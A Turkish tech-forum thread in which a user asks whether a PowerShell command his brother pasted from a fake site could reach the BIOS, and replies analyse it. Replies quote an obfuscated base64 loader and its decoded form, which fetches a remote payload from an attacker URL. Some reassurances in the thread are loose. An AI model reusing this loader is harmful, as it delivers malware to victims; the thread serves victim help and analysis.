PowerShell virüsü nedir?

ali yurtsal

ali yurtsal

Hectopat
Katılım
17 Ocak 2021
Mesajlar
8
Daha fazla  
Cinsiyet
Erkek
Arkadaşlar kardeşim İBB'nin spor okulunu araştırırken (istanbulbbsk.org) bu siteye girmiş ardından sitenin verdiği kodu yönetici olarak PowerShell uygulamasına girmiş.
Trojan olduğunu anlayıp bilgisayarı kapamış. Bilgisayarına format attım. Ancak siteye tekrar girdiğimde Kaspersky Premium beni korudu indirmeyi engelledi.
Sorum şu şekilde PowerShell'e atılan bu kod BIOS'a ya da başka alt bellekleri etkiler mi? (format atıldıktan sonra) BIOS'a kadar gidip gitmediğini nasıl anlarım?
Siteyi nasıl kapattırabilirim?

Ekran Alıntısı.PNG
 
Büyük ihtimalle etkilemez, basit bir troll batch kodudur. Fakat normalde .org, HTTPS kullanan siteler güvenli olur ama neden okul araştıran birisi PowerShell'e kod yazsın anlamadım :D. Siz kodu gönderebilir misiniz incelemek için?
 
479980 dedi:
Büyük ihtimalle etkilemez, basit bir troll batch kodudur. Fakat normalde .org, HTTPS kullanan siteler güvenli olur ama neden okul araştıran birisi PowerShell'e kod yazsın anlamadım :D. Siz kodu gönderebilir misiniz incelemek için?
Genişletmek için tıkla...

Kardeşim işte, site bir uyarı mesajı göndermiş ilk başta siteye sokmamış, mesajda o kodla PowerShell'e girmesi için direktifleri uygulamış sonra kodu Reddit'te arayınca virüs olduğunu anlamış. Kodu buldum uzun bir kod, yapanlar işlerini biliyorlar gibi.

SVBrowser = [System.Text.Encoding]::UTF3.GetString([System.Convert]::FromBase64String("JGpvYiA9IFN OYXJOLUpVYiAtU2NyaXB0QmxvY2sgewoglCAgQWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0 ZWOuV2|uZG93cy5Gb3Jtcwog!CAgW1N5c3RIbS5XaW5kb3dzLkZvcm1zLk1Ic3NhZ2VCb3hdOj pTaG93KCJUaGUgb3B|cmF0aW9u|GNvbXBsZXRIZCBzdWNjZXNzZnVsbHksIHBsZWFZZSBy2Wx vWOgdGhlHBhZ2UiLCAiU3|zdGVtliwgMCwgNjQpCn0KCiRnOTFGID0gJ2h0dHBzOi8vcnRhdH RhY2suYmFx2WJlaTEub25saW5IL2RmL3R0JwokdjM4SyA9IEB7ICdVc2VyLUFnZW50JyA9/CdN b3ppbGxhLzUuMCAoV2|uZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVd|YktpdC8 1MzcuMzYgKEtIVE1MLCBsaWt|IEd|Y2tvKSBDaHJvbWUvMTAyLjAuMC4wIFNhZmFyaS81Mzcu MzYn|H0KJHowNFEgPSBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICRnOTFG|C1Vc2VCYXNpY1Bhc nNpbmcgLUh|YWRIcnMgJHYzOEsKCk!FWCAoW1N5cRIbS5UZXh0LkVuY29kaW5nXTo6VVRG OC5HZXRTdHJpbmcoJHowNFEuQ29udGVudCkpCgpjbGVhci1ob3N00wo=")); $Update = | [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U2VOLUNsaX Bib2FyZCAtVmFsdWUgliA¡Ow=")); SVER = $VBrowser + "; " + $Update; Invoke-Expression SVER; exit;
 
ali yurtsal dedi:
Kardeşim işte, site bir uyarı mesajı göndermiş ilk başta siteye sokmamış, mesajda o kodla PowerShell'e girmesi için direktifleri uygulamış sonra kodu Reddit'te arayınca virüs olduğunu anlamış. Kodu buldum uzun bir kod, yapanlar işlerini biliyorlar gibi.

Svbrowser = [System.Text.Encoding]:utf3.getstring([System.Convert]:frombaSE64STRIng("jgpvyia9ıfn oyxjolupvyiatu2nyaxb0qmxvy2sgewoglcagqwrklvr5cguglufzc2vtymx5tmftzsbtexn0 zwouv2|uZG93CY5GB3jtcwog! Cagw1n5C3rıbs5xaw5KB3dzlkzvcm1zlk1ıc3nhz2vcb3hdoj ptAG93KCJUagugb3b|cmf0aw9u|gnvbxbszxrızcbzdwnjzxnzznvsbhksıhbszwfzzsby2wx vwogdghlhbhz2uilcaiu3|zdgvtliwgmcwgnjqpcn0kcirnotfgıd0gj2h0dhbzoi8vcnrhdh RhY2suYmFx2WJlaTEub25saW5IL2RmL3R0JwokdjM4SyA9IEB7ICdVc2VyLUFnZW50JyA9/CdN b3ppbgxhlzuumcaov2|uZG93CYBOvcaxmc4woybxAW42NDSGedy0ksbbchbszvd|yktpdc8 1mzcumzygketıve1mlcbsawt|ıed|y2tvksbdahjvbwuvmtayljaumc4wıfnhzmfyAS81MZCU mzyn|h0kjhownfegpsbjbnzva2utv2viumvxdwvzdcatvxjpıcrnotfg|c1vc2vcyxnpy1bhc nnpbmcgluh|ywrıcnmgjhyzoeskck! Fwcaow1n5crıbs5uzxh0lkvUY29KAW5nxto6vvrg OC5hzxrtdhjpbmcojhownfeUQ29UDGVudckpcgpjbgvhci1ob3n00WO=")); $update = | [System.Text.Encoding]:utf8.getstring([System.Convert]:frombaSE64STRIng("u2volunsax bib2fyzcatvmfsdwuglia¡ow=")); sver = $vbrowser + "; " + $update; ınvoke-expression sver; exit;
Genişletmek için tıkla...

Zararlı kod antivirüsleri geçmek için base64 ile şifrelenmiş. Şifreyi çözen sitelerle çözdüm fakat ileri seviye bir şey yok gibi görünüyor. Anladığım bir kısmı var bir yere web isteği gönderiyor onun dışında fazla bir şey yok. Şifrelerinizide değiştirip 2 adımlı doğrulamayı falan açın, anormallik var mı diye kontrol edin. Çünkü gönderdiği web isteğinizde çerezlerde gidiyor olabilir. Bu arada %95 gitmiştir formatla merak etmeyin ama yine de antivirüsle tüm cihazı tarayın.
 
479980 dedi:
Zararlı kod antivirüsleri geçmek için base64 ile şifrelenmiş. Şifreyi çözen sitelerle çözdüm fakat ileri seviye bir şey yok gibi görünüyor. Anladığım bir kısmı var bir yere web isteği gönderiyor onun dışında fazla bir şey yok. Şifrelerinizide değiştirip 2 adımlı doğrulamayı falan açın, anormallik var mı diye kontrol edin. Çünkü gönderdiği web isteğinizde çerezlerde gidiyor olabilir. Bu arada %95 gitmiştir formatla merak etmeyin ama yine de antivirüsle tüm cihazı tarayın.
Genişletmek için tıkla...

Çerezler derken? Bu kodu sadece 1 bilgisayar çalıştırdı kardeşim bütün şifrelerini değiştirdi. Ardı ardına format attım şuan bilgisayarı kurmadım .
 
ali yurtsal dedi:
Kardeşim işte, site bir uyarı mesajı göndermiş ilk başta siteye sokmamış, mesajda o kodla PowerShell'e girmesi için direktifleri uygulamış sonra kodu Reddit'te arayınca virüs olduğunu anlamış. Kodu buldum uzun bir kod, yapanlar işlerini biliyorlar gibi.

SVBrowser = [System.Text.Encoding]::UTF3.GetString([System.Convert]::FromBase64String("JGpvYiA9IFN OYXJOLUpVYiAtU2NyaXB0QmxvY2sgewoglCAgQWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0 ZWOuV2|uZG93cy5Gb3Jtcwog!CAgW1N5c3RIbS5XaW5kb3dzLkZvcm1zLk1Ic3NhZ2VCb3hdOj pTaG93KCJUaGUgb3B|cmF0aW9u|GNvbXBsZXRIZCBzdWNjZXNzZnVsbHksIHBsZWFZZSBy2Wx vWOgdGhlHBhZ2UiLCAiU3|zdGVtliwgMCwgNjQpCn0KCiRnOTFGID0gJ2h0dHBzOi8vcnRhdH RhY2suYmFx2WJlaTEub25saW5IL2RmL3R0JwokdjM4SyA9IEB7ICdVc2VyLUFnZW50JyA9/CdN b3ppbGxhLzUuMCAoV2|uZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVd|YktpdC8 1MzcuMzYgKEtIVE1MLCBsaWt|IEd|Y2tvKSBDaHJvbWUvMTAyLjAuMC4wIFNhZmFyaS81Mzcu MzYn|H0KJHowNFEgPSBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICRnOTFG|C1Vc2VCYXNpY1Bhc nNpbmcgLUh|YWRIcnMgJHYzOEsKCk!FWCAoW1N5cRIbS5UZXh0LkVuY29kaW5nXTo6VVRG OC5HZXRTdHJpbmcoJHowNFEuQ29udGVudCkpCgpjbGVhci1ob3N00wo=")); $Update = | [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U2VOLUNsaX Bib2FyZCAtVmFsdWUgliA¡Ow=")); SVER = $VBrowser + "; " + $Update; Invoke-Expression SVER; exit;
Genişletmek için tıkla...
Bu arada kod şifrelemesinin çözülmüş hali şu:

Bash: 
$job = SNarN-JUb -ScriptBlock {
    Add-Type -AssemblyName System.Windows.Forms
    [System.Windows.Forms.MessageBox]::Show("The operation completed successfully, please close the program", "System", 0, 64)
}

$g91F = 'https://rattack.bay-yev-xx-1.online/index.html'
$v38K = @{'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'}
$z04Q = Invoke-WebRequest -Uri $g91F -UseBasicParsing -Headers $v38K

[System.Text.Encoding]::UTF8.GetString($z04Q.Content)

clear-host
Set-Clipboard -Value "; "
Kafanızdaki soru işaretlerini atmak için uzatıyorum kusura bakmayın :).
Şimdi bu kod anladığım kadarı ile şunu yapıyor. Fark ettiyseniz orda garip bir web sitesi linki var. Şimdi o sitenin metin içeriğinde esas virüs kodu olan kod var. Bu programda hızlı bir şekilde o websitesindeki zararlı kodu alıp sizin panonuza kopyalıyor ve o kodu yine çok hızlı bir şekilde yapıştırıyor. Şu an siteye erişmeye çalışınca site kapalı gözüküyor yani artık bunu yapan kişiler falan internete salmış bırakmış büyük ihtimal. Yani fazla endişe edilece bir şey yok. Eğer yetenekli birisi olsaydı bu tür basit batch kodları ile uğraşmazdı diye düşünüyorum. Umarım içiniz rahatlamıştır :D.

ali yurtsal dedi:
Çerezler derken? Bu kodu sadece 1 bilgisayar çalıştırdı kardeşim bütün şifrelerini değiştirdi. Ardı ardına format attım şuan bilgisayarı kurmadım .
Genişletmek için tıkla...
Tamam bu da yeterli dert edinmenize gerek yok kurduktan sonra bir daha tarama yapın sonra keyfinize göre devam edebilirsiniz.
 
479980 dedi:
Bu arada kod şifrelemesinin çözülmüş hali şu:

Bash: 
$job = SNarN-JUb -ScriptBlock {
 Add-Type -AssemblyName System.Windows.Forms
 [System.Windows.Forms.MessageBox]::Show("The operation completed successfully, please close the program", "System", 0, 64)
}

$g91F = 'https://rattack.bay-yev-xx-1.online/index.html'
$v38K = @{'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'}
$z04Q = Invoke-WebRequest -Uri $g91F -UseBasicParsing -Headers $v38K

[System.Text.Encoding]::UTF8.GetString($z04Q.Content)

clear-host
Set-Clipboard -Value "; "
Kafanızdaki soru işaretlerini atmak için uzatıyorum kusura bakmayın :).
Şimdi bu kod anladığım kadarı ile şunu yapıyor. Fark ettiyseniz orada garip bir web sitesi linki var. Şimdi o sitenin metin içeriğinde esas virüs kodu olan kod var. Bu programda hızlı bir şekilde o web sitesindeki zararlı kodu alıp sizin panonuza kopyalıyor ve o kodu yine çok hızlı bir şekilde yapıştırıyor. Şu an siteye erişmeye çalışınca site kapalı gözüküyor yani artık bunu yapan kişiler falan internete salmış bırakmış büyük ihtimal. Yani fazla endişe edilece bir şey yok. Eğer yetenekli birisi olsaydı bu tür basit batch kodları ile uğraşmazdı diye düşünüyorum. Umarım içiniz rahatlamıştır :D.

Tamam bu da yeterli dert edinmenize gerek yok kurduktan sonra bir daha tarama yapın sonra keyfinize göre devam edebilirsiniz.
Genişletmek için tıkla...

İlginiz ve alakanız için çok teşekkür ediyorum büyük ihtimalle siteyi hacklemişler.
Ah bu kardeşler ah...
 

Benzer konular

3
  • Soru
YouTube sahte arama cubugu virüsü
Mesaj
9
Görüntüleme
1.187
Ahmet_53
Ahmet_53
Onurrr123
Sahte siteden virüs bulaştığı nasıl anlaşılır?
2
Mesaj
10
Görüntüleme
226
Collavino
Collavino
M
  • Soru
Fidye virüsü bulaştı
2
Mesaj
15
Görüntüleme
579
Mahreem
M
roger12
Sahte siteden virüs bulaşır mı?
Mesaj
5
Görüntüleme
273
roger12
roger12
Volmestro
Yesevikurumu.com sahte site mi?
2 3
Mesaj
20
Görüntüleme
971
THE_MILLER
THE_MILLER

Technopat Haberler

Yeni konular

Yeni mesajlar

Geri
Yukarı